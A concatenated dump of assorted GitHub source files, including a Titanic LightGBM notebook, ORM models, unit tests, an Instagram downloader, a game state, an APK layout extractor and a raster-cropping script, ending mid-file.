0.8, n_jobs = -1, random_state = 50)\n \n # Train the model\n model.fit(train_features, train_labels, eval_metric = 'auc',\n eval_set = [(valid_features, valid_labels), (train_features, train_labels)],\n eval_names = ['valid', 'train'], categorical_feature = cat_indices,\n early_stopping_rounds = 100, verbose = 200)\n \n # Record the best iteration\n best_iteration = model.best_iteration_\n \n # Record the feature importances\n feature_importance_values += model.feature_importances_ / k_fold.n_splits\n \n # Make predictions\n test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits\n \n # Record the out of fold predictions\n out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]\n \n # Record the best score\n valid_score = model.best_score_['valid']['auc']\n train_score = model.best_score_['train']['auc']\n \n valid_scores.append(valid_score)\n train_scores.append(train_score)\n \n # Clean up memory\n gc.enable()\n del model, train_features, valid_features\n gc.collect()\n \n # Make the submission dataframe\n submission = pd.DataFrame({'ID': test_ids, 'Survived': test_predictions})\n \n # Make the feature importance dataframe\n feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})\n \n # Overall validation score\n valid_auc = roc_auc_score(labels, out_of_fold)\n \n # Add the overall scores to the metrics\n valid_scores.append(valid_auc)\n train_scores.append(np.mean(train_scores))\n \n # Needed for creating dataframe of validation scores\n fold_names = list(range(n_folds))\n fold_names.append('overall')\n \n # Dataframe of validation scores\n metrics = pd.DataFrame({'fold': fold_names,\n 'train': train_scores,\n 'valid': valid_scores}) \n \n return submission, feature_importances, metrics\n\n\n# In[ ]:\n\n\ndef plot_feature_importances(df):\n \"\"\"\n Plot importances returned by a model. This can work with any measure of\n feature importance provided that higher importance is better. \n \n Args:\n df (dataframe): feature importances. Must have the features in a column\n called `features` and the importances in a column called `importance\n \n Returns:\n shows a plot of the 15 most importance features\n \n df (dataframe): feature importances sorted by importance (highest to lowest) \n with a column for normalized importance\n \"\"\"\n \n # Sort features according to importance\n df = df.sort_values('importance', ascending = False).reset_index()\n \n # Normalize the feature importances to add up to one\n df['importance_normalized'] = df['importance'] / df['importance'].sum()\n\n # Make a horizontal bar chart of feature importances\n plt.figure(figsize = (10, 6))\n ax = plt.subplot()\n \n # Need to reverse the index to plot most important on top\n ax.barh(list(reversed(list(df.index[:15]))), \n df['importance_normalized'].head(15), \n align = 'center', edgecolor = 'k')\n \n # Set the yticks and labels\n ax.set_yticks(list(reversed(list(df.index[:15]))))\n ax.set_yticklabels(df['feature'].head(15))\n \n # Plot labeling\n plt.xlabel('Normalized Importance'); plt.title('Feature Importances')\n plt.show()\n \n return df\n\n\n# ### Let us now employ the functions above to run the model\n\n# In[ ]:\n\n\nsubmission, correlations, metrics = model(train_df,test_fin)\n\n\n# In[ ]:\n\n\nmetrics\n\n\n# In[ ]:\n\n\n#lets plot the feature importances\ncorr = plot_feature_importances(correlations)\n\n\n# In[ ]:\n\n\nsubmission['Survived'] = submission['Survived'].round(0)\n\n\n# In[ ]:\n\n\n# submission.to_csv('Titanic_Submission2.csv')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/atwine/titanic-first-trial/titanic-first-trial.py","file_name":"titanic-first-trial.py","file_ext":"py","file_size_in_byte":17206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"13100998106","text":"from handshake.services.DBService.models.static_base import AttachmentFields\nfrom handshake.services.DBService.models.result_base import SuiteBase\nfrom tortoise.models import Model\nfrom tortoise.fields import (\n CharField,\n DatetimeField,\n JSONField,\n CharEnumField,\n ForeignKeyField,\n ForeignKeyRelation,\n BooleanField,\n TextField,\n)\nfrom handshake.services.SchedularService.constants import JobType\nfrom handshake.services.DBService.models.result_base import RunBase\nfrom handshake.services.DBService.models.enums import PrunedRecords\n\n\nclass TaskBase(Model):\n table = \"TaskBase\"\n\n ticketID = CharField(max_length=45, pk=True)\n type = CharEnumField(JobType, null=False)\n dropped = DatetimeField(auto_now=True) # use modified timestamp\n # this would schedule the parent suites in the later rounds\n meta = JSONField(\n null=True,\n default={},\n description=\"Data required to process the task, Not used as of now though\",\n )\n test: ForeignKeyRelation[RunBase] = ForeignKeyField(\n \"models.RunBase\", related_name=\"tasks\", to_field=\"testID\"\n )\n picked = BooleanField(\n null=True,\n default=False,\n description=\"True if the task is picked by the job else False\",\n )\n\n\nclass DynamicVideoBase(AttachmentFields):\n table = \"VideoBase\"\n test: ForeignKeyRelation[SuiteBase] = ForeignKeyField(\n \"models.SuiteBase\", related_name=\"attachments\", to_field=\"suiteID\"\n )\n\n\nclass PrunedBase:\n prunedID = CharField(\n max_length=36, description=\"possibly uuid of length 36 that was pruned\"\n )\n reason = TextField(description=\"Reason for its existence here\")\n details = JSONField(\n null=True, default={}, description=\"If any details were required\"\n )\n type = CharEnumField(PrunedRecords, null=False)\n","repo_name":"RahulARanger/graspit","sub_path":"handshake/services/DBService/models/dynamic_base.py","file_name":"dynamic_base.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503947681","text":"#!/usr/bin/env python3\n\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\n\n\ndef round_0_255(num):\n if num < 0:\n return 0\n elif num > 255:\n return 255\n else:\n return num\n\n\nwhile True:\n n_samples, m_codes = map(int, input().split())\n if n_samples == 0 and m_codes == 0:\n break\n\n code_book = []\n for _ in range(m_codes):\n code_book.append(int(input()))\n\n input_signal = []\n for _ in range(n_samples):\n input_signal.append(int(input()))\n\n # print(code_book, input_signal)\n\n # dp[i + 1][j]: i番目の入力信号を復号した結果がjとなる場合の、(i番目までの信号の)差の二乗和の最小値\n # i番目の入力信号を復号した結果をy_iとすると、y_iは以下で与えられる\n # y_i = y_{i-1} + C[k_i]\n # sq_diff = (x[i] - y_i) ** 2\n # dp[i + 1][j] = min(dp[i + 1][j], dp[i][j - C[k_i]] + sq_diff)\n\n inf = float(\"inf\")\n dp = [[inf for j in range(255 + 1)] for i in range(n_samples + 1)]\n dp[0][128] = 0\n\n for i in range(n_samples):\n for j in range(255 + 1):\n for c_k in code_book:\n sq_diff = (input_signal[i] - j) ** 2\n dp[i + 1][j] = min(dp[i + 1][j], dp[i][round_0_255(j - c_k)] + sq_diff)\n # print(dp[n_samples])\n print(min(dp[n_samples]))\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/45-dpcm.py","file_name":"45-dpcm.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38175203642","text":"import unittest\nfrom datetime import datetime\nfrom main import (\n retrieve_transaction_data,\n retrieve_wallet_creation_date,\n retrieve_balance_at_date\n)\n\nclass TestMain(unittest.TestCase):\n def test_retrieve_transaction_data(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n starting_block = \"1000000\"\n transactions = retrieve_transaction_data(wallet_address, starting_block)\n self.assertIsInstance(transactions, list)\n\n # Test invalid starting block\n invalid_starting_block = \"-100\"\n with self.assertRaises(ValueError):\n retrieve_transaction_data(wallet_address, invalid_starting_block)\n\n def test_retrieve_wallet_creation_date(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n creation_date = retrieve_wallet_creation_date(wallet_address)\n self.assertIsInstance(creation_date, datetime)\n\n # Test invalid wallet address\n invalid_wallet_address = \"\"\n with self.assertRaises(ValueError):\n retrieve_wallet_creation_date(invalid_wallet_address)\n \n def test_retrieve_balance_at_date(self):\n # Test valid inputs\n wallet_address = \"0x1234567890123456789012345678901234567890\"\n check_date = datetime.today().replace(hour=0, minute=0, second=0, microsecond=0)\n balance_eth = retrieve_balance_at_date(wallet_address, check_date)\n self.assertIsInstance(balance_eth, float)\n\n # Test check date before wallet creation\n wallet_creation_date = datetime(2022, 1, 1)\n with self.assertRaises(ValueError):\n retrieve_balance_at_date(wallet_address, wallet_creation_date)\n\n # Test check date after today\n future_date = datetime.today().replace(year=2025)\n with self.assertRaises(ValueError):\n retrieve_balance_at_date(wallet_address, future_date)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"miroslavkosanovic/Ethereum-transactions-crawler-task","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21337172857","text":"from __future__ import absolute_import\nimport koji\nimport mock\nimport unittest\nfrom six.moves import StringIO\n\nfrom koji_cli.commands import anon_handle_list_untagged\nfrom . import utils\n\n\nclass TestListUntagged(utils.CliTestCase):\n def setUp(self):\n self.maxDiff = None\n self.session = mock.MagicMock()\n self.options = mock.MagicMock()\n self.untagged_values = [{'id': 1,\n 'name': 'test-package-1234',\n 'release': '11',\n 'version': '1.1'},\n {'id': 2,\n 'name': 'test-package-1234',\n 'release': '99',\n 'version': '1.33'}\n ]\n\n def __vm(self, result):\n m = koji.VirtualCall('mcall_method', [], {})\n if isinstance(result, dict) and result.get('faultCode'):\n m._result = result\n else:\n m._result = (result,)\n return m\n\n def tearDown(self):\n mock.patch.stopall()\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_without_arguments(self, ensure_connection_mock,\n stdout):\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join([u['name'] + '-' + u['version'] + '-' +\n u['release'] for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session, [package_name])\n self.assert_console_message(stdout, expected)\n\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_more_arguments(self, ensure_connection_mock):\n packages_name = ['test-package-1', 'test-package-2']\n expected = \"\"\"Usage: %s list-untagged [options] [<package>]\n(Specify the --help global option for a list of other help options)\n\n%s: error: Only one package name may be specified\\n\"\"\" % (self.progname,\n self.progname)\n self.assert_system_exit(\n anon_handle_list_untagged,\n self.options,\n self.session,\n [packages_name[0], packages_name[0]],\n stderr=expected,\n activate_session=None)\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_package(self, ensure_connection, stdout, stderr):\n # test case when package is existing\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join([u['name'] + '-' + u['version'] + '-' +\n u['release'] for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session, [package_name])\n self.assert_console_message(stdout, expected)\n\n self.session.untaggedBuilds.reset_mock()\n\n # test case when package is not existing\n package_name = 'test-package'\n expected = \"No such package: %s\" % package_name + \"\\n\"\n self.session.untaggedBuilds.return_value = []\n self.session.getPackageID.return_value = None\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_untagged(self.options, self.session,\n [package_name])\n self.assertExitCode(ex, 1)\n self.assert_console_message(stderr, expected)\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_package_path(self, ensure_connection, stdout):\n # test case when package is existing\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n expected = \"\\n\".join(['/mnt/koji/packages/' + u['name'] + '/' +\n u['version'] + '/' + u['release']\n for u in self.untagged_values]) + \"\\n\"\n anon_handle_list_untagged(self.options, self.session,\n ['--paths', package_name])\n self.assert_console_message(stdout, expected)\n\n @mock.patch('sys.stdout', new_callable=StringIO)\n @mock.patch('koji_cli.commands.ensure_connection')\n def test_list_untagged_package_show_references(self, ensure_connection, stdout):\n # test case when package is existing\n rpms = [{'rpm_id': 123}, {'rpm_id': 125}]\n archives = [{'archive_id': 999}, {'archive_id': 888}]\n components = [{'archive_id': 999, 'rpm_id': 125}]\n build_references = {'tags': [{'name': 'tag-48rj15ma3a', 'tag_id': 2}],\n 'rpms': rpms,\n 'component_of': components,\n 'archives': archives,\n 'last_used': None,\n 'images': []}\n mcall = self.session.multicall.return_value.__enter__.return_value\n mcall.buildReferences.return_value = self.__vm(build_references)\n package_name = 'test-package-1234'\n\n self.session.untaggedBuilds.return_value = self.untagged_values\n list_untagged = [u['name'] + '-' + u['version'] + '-' + u['release']\n for u in self.untagged_values]\n expected = \"\"\"(Showing build references)\n%s rpms: %s, images/archives: %s, archives buildroots: %s\n%s rpms: %s, images/archives: %s, archives buildroots: %s\n\"\"\" % (list_untagged[0], rpms, components, archives, list_untagged[1], rpms, components, archives)\n anon_handle_list_untagged(self.options, self.session,\n ['--show-references', package_name])\n self.assert_console_message(stdout, expected)\n\n def test_handle_list_history_help(self):\n self.assert_help(\n anon_handle_list_untagged,\n \"\"\"Usage: %s list-untagged [options] [<package>]\n(Specify the --help global option for a list of other help options)\n\nOptions:\n -h, --help show this help message and exit\n --paths Show the file paths\n --show-references Show build references\n\"\"\" % self.progname)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"yifengyou/koji","sub_path":"BUILD/koji-1.33.0/tests/test_cli/test_list_untagged.py","file_name":"test_list_untagged.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"1601764583","text":"import instaloader\nimport os\n\nL = instaloader.Instaloader()\nL.load_session_from_file(\"username\")\n\nrootWorkingDirectory = os.getcwd() \n\ndef comparator2000(targetUsername: str) -> str:\n '''\n This function check if the ```targetUsername`` folder exists, if not, create one and enter.\n '''\n # Check if exists, if not, create.\n if not os.path.exists(targetUsername):\n os.makedirs(targetUsername)\n \n # Changue directory to targetUsername\n os.chdir(targetUsername)\n return str(f\"Im here {os.getcwd()}, tick.\")\n \n\ndef comparator3000(targetUsername: str, downloadType: str) -> str:\n '''\n This function will test if the directory of the ``targetUsername`` exists, if not create the folder\n and enter, the same for ``downloadType`` which is the name of the media type being downloaded,\n currently are: ``Posts``, ``Stories``, ``Highlights``.\n '''\n\n # Check if dir exists, if not, create.\n if not os.path.exists(targetUsername):\n os.makedirs(targetUsername)\n\n # Changue dir to the target username's\n os.chdir(targetUsername)\n\n # Check if exists the highlights folder if not, create\n if not os.path.exists(downloadType):\n os.makedirs(downloadType)\n\n # Changue working dir to the highlight folder\n os.chdir(downloadType)\n return str(f\"Im here {os.getcwd()}, tick.\")\n\n\ndef downloadHL(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Highlights\")\n\n # Get the list of the aviable highlights os the target and download,\n # every folder, has his original title. \n for highlight in L.get_highlights(instaloader.Profile.from_username(Lcontext, targetUsername)):\n print(highlight.cover_url + '\\nCurrently its not possible to download original highlight cover due to InstaLoader Lib.')\n for item in highlight.get_items():\n L.download_storyitem(item, highlight.title)\n\n # Changue the working dir to the given in the function,\n # i recommend to put every profile in a single folder \"root working dir\"\n os.chdir(rootWD)\n return 0\n\ndef downloadStories(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Stories\")\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n for story in L.get_stories([userData.userid]):\n for item in story.get_items():\n L.download_storyitem(item, f\"{str(item.date).replace(' ', '_', 1).replace(':', '-').replace(' ', '')}_UTC\")\n \n os.chdir(rootWD)\n return 0\n\ndef downloadPosts(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Posts\")\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n posts = userData.get_posts()\n\n print(f'Profile: {userData.username}, contain: {posts.count} posts.')\n\n for post in posts:\n L.download_post(post, post.date_utc)\n L.download_comments = True\n L.download_geotags = True\n\n os.chdir(rootWD)\n return 0\n\ndef downloadProfilePic(Lcontext, targetUsername: str, rootWD):\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n comparator3000(targetUsername, \"Profile Pictures\")\n\n \n\n os.chdir(rootWD)\n return 0\n\ndef writeUserMD(Lcontext, targetUsername: str, rootWD):\n comparator2000(targetUsername)\n profileData = instaloader.Profile.from_username(Lcontext, targetUsername)\n # This will download only the user profile to a pretty json file. \n instaloader.save_structure_to_file(profileData, f\"{targetUsername}.json\")\n # This will write the resume of the profile in a text file.\n with open(f\"{targetUsername}_resume.txt\", \"w\", encoding=\"utf-8\") as f:\n f.writelines(f\"{profileData.full_name}\\nTotal posts: {profileData.mediacount}\\nTotal Followers: {profileData.followers}\\nFollowing: {profileData.followees}\\n{profileData.biography}\\n{profileData.external_url}\\nSponsors:\\n{profileData.entities}\")\n os.chdir(rootWD)\n return 0\n\n# downloadPosts(L.context, username, rootWorkingDirectory)\n# profileJSON = \"n\"\n# dumpedJSON = json.dumps(profileJSON, sort_keys=True, indent=4, ensure_ascii=False)\n# print(dumpedJSON)\n\n\n# def downloadIGTV(Lcontext, targetUsername: str, rootWD):\n\n# comparator3000(targetUsername, \"IGTV\")\n\n# userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n# igtvPosts = userData.get_igtv_posts()\n\n# for post in igtvPosts:\n# print(post.title) \n","repo_name":"jamesphoenixcode/prettyIL","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"602733495","text":"n = str(input(\"Digite um numero de 0 a 9999:\"))\nuni = n[3]\ndez = n[2]\ncen = n[1] \nmil = n[0] \nprint(\"Unidade:{}\\nDezena:{}\\nCentena:{}\\nMilhar:{}\".format(uni, dez, cen, mil))\n#Serve apenas para 1000 ate 9999, se vier outro numero, da errro\n\n\n\n","repo_name":"kamibarreto/Exercicios","sub_path":"023.py","file_name":"023.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"12902906570","text":"from fenics import * \n#Subdivisions of x and t sections \nxSection = 100\ntSection = 100\n\n#Point definitions for boundary of domain\na = Point(0,0)\nb = Point(100,100)\n\n#Rectangular region of defined mesh \nmesh = RectangleMesh(a,b,xSection, tSection)\nV = FunctionSpace(mesh, 'P', 1)\n\n#Functional representation of B term in Van Deemter Equation\nu_D = Expression('2*x[0]*x[0]/x[1]', degree = 2)\n\n#Defines boundary function and conditions of boundary \ndef boundary(x, onBoundary): \n return onBoundary \nbc = DirichletBC(V, Constant(0), boundary)\n\n#Vector field intepretations of the field V with constant f(0) as a solution\nu = TrialFunction(V)\nv = TestFunction(V)\nf = Constant(0)\n\n#Interpolation of vector field by function \nu_n = interpolate(u_D, V)\nu_n.rename('u', 'initial value')\n\n\n#Use of vector fields and known solution allows function F as expansion \nF = u*v*dx + dt*dot(grad(u), grad(v))*dx - (u_n + dt*f)*v*dx\n\n#Left hand side and right hand sides of vector field \na, L = lhs(F), rhs(F)\n\nu = Function(V)\nu.rename('u', 'solution')\n\n#Function to find conditions such that a==L & u & bc \n#Specific solution for PDE system \nsolve(a == L, u, bc)\n\nplot (u)\nplot(mesh)\n\n#Exporting to vtk format for visualization\nvtkfile = File('NoiseSolution.pvd')\nvtkfile << u \n\n\ninteractive()\n","repo_name":"adpender/Comp50HFinal","sub_path":"NoiseExample.py","file_name":"NoiseExample.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24688888582","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" 针对 apk 文件夹进行基于 SOOT 的布局序列提取,将结果输出到 apk_tokens_dir 目录中(该方法即将废弃)。\n\"\"\"\n\nimport os\nimport platform\nimport shutil\nimport subprocess\nimport time\nimport xml.etree.ElementTree as ET\nfrom configparser import ConfigParser\n\nfrom decomp.layout_utils import optimize_sequence\nfrom utils.logging import Loggers\n\ncfg = ConfigParser()\ncfg.read('../config.ini')\n\napk_dir = cfg.get('decode', 'apk_dir')\ntemp_dir = cfg.get('decode', 'temp_dir')\napk_tokens_dir = cfg.get('decode', 'apk_tokens_dir')\n\nandroid_jars = cfg.get('decode', 'android_jars')\nsoot_jar = cfg.get('decode', 'soot_jar')\nsoot_output = cfg.get('decode', 'soot_output')\n\nlog_dir = cfg.get('log', 'log_dir')\n\nTIME_OUT = 300\n\n\ndef remove_dir(path):\n if os.path.exists(path) and os.path.isdir(path):\n shutil.rmtree(path, ignore_errors=True)\n\n\nif __name__ == '__main__':\n\n log = Loggers(level='debug', log_dir=log_dir)\n\n file_abps = []\n\n for f in os.listdir(apk_dir):\n category_dir = os.path.join(apk_dir, f)\n if os.path.isdir(category_dir): # category\n for sub_dir in os.listdir(category_dir):\n sub_dp = os.path.join(category_dir, sub_dir)\n if os.path.isdir(sub_dp): # apk_subdir\n for package_name in os.listdir(os.path.join(sub_dp)):\n fp = os.path.join(sub_dp, package_name)\n if os.path.isfile(fp) and fp.endswith('.apk') and not fp.startswith('.'):\n file_abps.append(fp)\n\n log.logger.info('Layout extraction on ' + str(len(file_abps)) + ' APK(s) started.')\n\n for i, apk_path in enumerate(file_abps):\n # file_name = os.path.splitext(file)[0]\n # apk_path = os.path.join(apk_dir, file)\n _, apk_name = os.path.split(apk_path)\n apktool_out_path = os.path.join(temp_dir, apk_name)\n\n start_time = time.time()\n log.logger.info('(' + str(i + 1) + '/' + str(len(file_abps)) + ') Analysis started on ' + apk_path)\n\n # 执行 apktool 命令\n if platform.system() == 'Windows':\n subprocess.call(['apktool', 'd', apk_path, '-f', '-o', apktool_out_path], shell=True)\n else:\n subprocess.call(['apktool', 'd', apk_path, '-f', '-o', apktool_out_path])\n\n # 检查 apktool 结果目录的状态\n if not os.path.isdir(apktool_out_path):\n log.logger.error('Apktool decoding failed.')\n continue\n\n # 获取包名作为标识符\n package = None\n manifest_fp = os.path.join(apktool_out_path, 'AndroidManifest.xml')\n if os.path.isfile(manifest_fp):\n try:\n e = ET.parse(manifest_fp).getroot()\n if e.tag == 'manifest':\n package = e.attrib['package']\n log.logger.info('APK package is parsed: ' + package)\n except ET.ParseError as e:\n # 解析错误跳过\n log.logger.error('AndroidManifest.xml parsed error.')\n continue\n if package is None:\n package = apk_name\n log.logger.info('APK package is not parsed, using ' + package + ' to substitute.')\n\n if not os.path.exists(soot_output):\n os.makedirs(soot_output)\n\n cmd = ['java', '-jar', soot_jar,\n '-d', soot_output,\n '-android-jars', android_jars,\n '-package', package,\n '-process-dir', apk_path,\n '-apktool-dir', apktool_out_path,\n '-token-dir', apk_tokens_dir,\n '-process-multiple-dex', '-allow-phantom-refs']\n\n log.logger.info('Soot analysis is running (time out = ' + str(TIME_OUT) +\n 's). The output will display after the subprocess ended.')\n\n # 执行 soot 程序并处理返回\n try:\n out_bytes = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=TIME_OUT)\n except subprocess.TimeoutExpired as e:\n # 处理超时异常\n log.logger.error(str(type(e)) + ' Soot analysis times out >>> Skip ' + apk_path)\n log.logger.error(e.output)\n except subprocess.CalledProcessError as e:\n # 处理调用失败异常\n log.logger.error(str(type(e)))\n utf_message = e.output.decode('utf-8', 'ignore')\n log.logger.error(e.output)\n else:\n print(out_bytes.decode('utf-8', 'ignore'))\n tmp_tokens_fp = os.path.join(apk_tokens_dir, package + '-layout.tmp.lst')\n tokens_fp = os.path.join(apk_tokens_dir, package + '-layout.lst')\n log.logger.info('Soot finished. Start optimizing soot outputted layout.')\n if os.path.isfile(tmp_tokens_fp):\n with open(tokens_fp, 'w') as wf:\n line_cnt = 0\n with open(tmp_tokens_fp, 'r') as rf:\n for j, line in enumerate(rf):\n line_sp = line.split()\n layout_type = int(line_sp[0])\n xml_name = line_sp[1]\n tokens = line_sp[2:]\n opt_tokens, opt_seq = optimize_sequence(' '.join(tokens))\n wf.write(\n str(layout_type) + ' ' + xml_name + ' ' + str(len(opt_tokens)) + ' ' + opt_seq + '\\n')\n line_cnt = j + 1\n if line_cnt == 0:\n os.remove(tokens_fp)\n os.remove(tmp_tokens_fp)\n finally:\n remove_dir(apktool_out_path) # 删除 apktool 生成目录,如果需要可以注释这一行\n remove_dir(soot_output)\n log.logger.info('Intermediate files produced by Soot and Apktool are removed.')\n log.logger.info(\n 'Analysis on ' + apk_path + ' finished. It has run for {:.2f} s.'.format(time.time() - start_time))\n\n log.logger.info('Layout extraction on ' + str(len(file_abps)) + ' APK(s) finished.')\n","repo_name":"xfge/SketchesGeneration","sub_path":"decomp/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4625577385","text":"import game_framework\nfrom pico2d import *\n\nimport Main\n\nname = \"OverState\"\nimage = None\ncharacter_dead = None\nretry = None\nframe = 0.0\n\n#Player Size\nSizeX = 236\nSizeY = 188\n\n# Player Action Speed\nTIME_PER_ACTION = 0.5\nACTION_PER_TIME = 0.3 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 10\n\ndef enter():\n global image, character_dead, retry\n\n image = load_image('Resource/UI/Gameover.png')\n character_dead = load_image('Resource/Death.png')\n retry = load_image('Resource/UI/retry.png')\n\n\ndef exit():\n global image, character_dead, retry\n del(image)\n del(character_dead)\n del(retry)\n\n\ndef handle_events():\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n else:\n if (event.type, event.key) == (SDL_KEYDOWN, SDLK_ESCAPE):\n game_framework.quit()\n elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_SPACE):\n game_framework.change_state(Main)\n\n\ndef draw():\n global frame\n\n clear_canvas()\n image.draw(400, 225)\n character_dead.clip_draw(int(frame) * SizeX, 0, SizeX, SizeY, 400, 200)\n if frame >= 9:\n retry.draw(600, 120)\n update_canvas()\n\n\ndef update():\n global frame\n if frame <= 9:\n frame = (frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 10\n","repo_name":"kyoungsub/2014180031-2DGP","sub_path":"Game/Over_state.py","file_name":"Over_state.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34429940858","text":"import marshmallow as ma\nfrom oarepo_model_builder.datatypes import ModelDataType\n\n\nclass DraftFileDataType(ModelDataType):\n model_type = \"draft-file\"\n\n class ModelSchema(ModelDataType.ModelSchema):\n type = ma.fields.Str(\n load_default=\"draft-file\",\n required=False,\n validate=ma.validate.Equal(\"draft-file\"),\n )\n\n def prepare(self, context):\n self.draft_record = context[\"draft_record\"]\n self.file_record = context[\"file_record\"]\n super().prepare(context)\n","repo_name":"oarepo/oarepo-model-builder-drafts-files","sub_path":"oarepo_model_builder_drafts_files/datatypes/draft_file.py","file_name":"draft_file.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25025579800","text":"#!/usr/bin/python\n\"\"\"\nCreated on Thu Dec 27 13:37:32 2018\n@author: Ziyi Gong, Samuel Konat\nVersion: python 3.6\n\"\"\"\n\nimport psycopg2\nfrom math import *\nfrom osgeo import gdal\nfrom osgeo import osr\nfrom affine import Affine\nimport sys\nimport os\n\nR = 6371 # Radius of the Earth\nGS = [64] # Grid sizes in pixels\n\norgLoc = '/home/ubuntu/kynesfield/datasets/original'\ncpdLoc = '/home/ubuntu/kynesfield/datasets/clipped'\n\n# Database details\ndbhost = \"localhost\"\ndbname = \"postgres\"\ndbuser = \"postgres\"\ndbpass = \"kynes\"\ndbconn = None\n\n# Translation variables\nIN = osr.SpatialReference()\nIN.ImportFromEPSG(4326)\nOUT = osr.SpatialReference()\nOUT.ImportFromEPSG(3665)\nTRANS = osr.CoordinateTransformation(IN,OUT)\n\n'''\nParameters:\n latitude, longitude: coordinates of a point in MRDS data\n length: the length of the square enclosing the point\n \n Returns minx, miny, maxx, and maxy coordinates of the square\n'''\ndef vertices(latitude, longitude, length):\n # latitude to radians\n r_lat = latitude * pi / 180\n \n a = float(length) / (4 * R)\n diff_long = asin(sin(a) / cos(r_lat)) * 2 * 180 / pi\n diff_lat = a * 2 * 180 / pi\n \n \n projWin = TRANS.TransformPoint(longitude - diff_long, latitude + diff_lat)[:-1] + \\\n TRANS.TransformPoint(longitude + diff_long, latitude - diff_lat)[:-1]\n \n return projWin\n \n\ndef pixel_centered_square(gt, lng, lat, D):\n forward_trans = Affine.from_gdal(*gt)\n reverse_trans = ~forward_trans\n px, py = reverse_trans * (lng, lat)\n px, py = int(px + 0.5), int(py + 0.5) # round to int pixel coordinate\n \n ulx, uly, lrx, lry = px - int(D/2), py - int(D/2), px + int(D/2), py + int(D/2)\n \n ulx, uly = forward_trans * (ulx, uly)\n lrx, lry = forward_trans * (lrx, lry)\n return (ulx, uly, lrx, lry)\n\n\n'''\n Reads raster image files, crops rasters based on coordinates in MRDS and \n stores the stored rasters into the database\n'''\ndef get_raster_grids(rasters):\n # Connect to the PostgreSQL database server\n conn = None\n try:\n # Establishing database connection\n conn = psycopg2.connect(host = dbhost, database = dbname,\n user = dbuser, password = dbpass)\n cur = conn.cursor()\n cur.execute('SELECT latitude, longitude, site_id FROM t_site;')\n mrds = cur.fetchall()\n \n if rasters is not None:\n files = rasters\n else:\n cur.execute('SELECT filename FROM t_raster_master')\n files = cur.fetchall()\n\n cur.execute(\n \"prepare putrasters as \"\n \"insert into t_raster_cropped(raster_name,site_id,resolution,filename,filepath) values($1,$2,$3,$4,$5)\")\n\t\n for D in GS:\n rsln = str(D) + 'x' + str(D)\n for fl in files:\n 